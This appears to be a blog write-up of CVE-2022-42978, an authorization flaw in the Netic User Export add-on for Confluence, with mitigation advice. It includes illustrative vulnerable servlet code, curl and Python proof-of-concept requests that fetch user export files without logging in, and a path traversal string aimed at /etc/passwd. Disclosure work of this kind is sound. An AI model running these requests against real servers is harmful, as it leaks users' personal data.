CVE-2022-42978 - How a Small Authorization Bug in Netic User Export for Confluence Leads to Unauthenticated File Access

Software security bugs are everywhere, but few are as surprising as those that let random users read files they shouldn’t be able to see. In this long read, I’ll walk you through CVE-2022-42978, a vulnerability in the Netic User Export add-on for Atlassian Confluence (before version 1.3.5).

This flaw makes it possible for anybody on the internet to download files directly from your server running Confluence, even if they don’t have an account. It’s a classic case of broken authorization. I’ll show you the details, share some proof-of-concept code, and explain how you can protect your systems.

What is Netic User Export?

Netic User Export is a plugin (add-on) for Atlassian Confluence, the popular team wiki tool. This addon helps administrators export user data, making it easy to manage and review lists of users.

But before version 1.3.5, there was a big security mistake in how user export files were handled.

The Core Problem: Missing Authorization Checks

When a plugin lets you export user data or files, it should always check who is making the request. Only admins or authenticated users should be able to trigger an export or download these files.

In Netic User Export before 1.3.5, attackers discovered that the endpoint for exporting data didn’t check if the person using it was logged in or had any special permission! This means an attacker could guess the endpoint’s address and directly access sensitive exports—no login needed.

Pseudo-code Snippet

// Imaginary vulnerable code - simplified!
public void doGet(HttpServletRequest request, HttpServletResponse response) {
    String filename = request.getParameter("file");
    File exportFile = new File(EXPORT_PATH, filename);

    // MISSING: Authentication and authorization checks here!

    response.setContentType("application/octet-stream");
    Files.copy(exportFile.toPath(), response.getOutputStream());
}

Notice that there’s no check for user identity or permissions. Anyone can ask for any file available in the export folder.

Finding the Endpoint

After installing the Netic User Export plugin, it exposes an endpoint inside your Confluence server, like:

https://confluence.example.com/plugins/servlet/user-export?file=export.csv

The Exploit

An attacker doesn’t need a username or password. If they know or can guess the filename (like export.csv), they can directly download it:

Bash PoC

curl "https://confluence.example.com/plugins/servlet/user-export?file=export.csv" -o exported_users.csv

They’ll get the full exported user list, which may contain usernames, emails, and more—ripe for spear phishing, spam, or more severe attacks.

Python PoC

import requests

url = "https://confluence.example.com/plugins/servlet/user-export";
params = {"file": "export.csv"}

with requests.get(url, params=params) as resp:
    if resp.status_code == 200:
        with open("leaked_export.csv", "wb") as f:
            f.write(resp.content)
        print("Exported data leaked!")
    else:
        print("Could not access the export file.")

Beyond the Demo

If the file parameter is not properly sanitized, attackers might also attempt path traversal (e.g., using ../../../../etc/passwd), but there is no public evidence this exploit goes that far in this plugin.

References & More Reading

- NVD CVE Page for CVE-2022-42978
- Netic User Export Marketplace page
- Atlassian Confluence Security Advisories
- Path Traversal Attacks Explained (OWASP)

Mitigation and Fix

Upgrade to Netic User Export version 1.3.5 or higher.
The fixed version ensures proper checks for authentication and authorization, locking down the export endpoint:

> Always keep plugins up to date, just like you do with your main application!

Remove the plugin until it’s safe

- Block access to /plugins/servlet/user-export using a web application firewall

Final Thoughts

The lesson here is clear: Never trust plugin endpoints to “do the right thing” out of the box. Small mistakes in authorization checks can lead to big data leaks.

Review your add-ons, keep them updated, and always monitor for new CVEs. If you’re developing your own extensions for Confluence (or anything else!), remember to restrict sensitive actions to the right users.

If you want to stay on top of new security issues like this, follow the CVE database and your vendors’ security advisories—it’s worth the ten minutes a week.

Timeline

Published on: 11/15/2022 01:15:00 UTC
Last modified on: 11/17/2022 04:59:00 UTC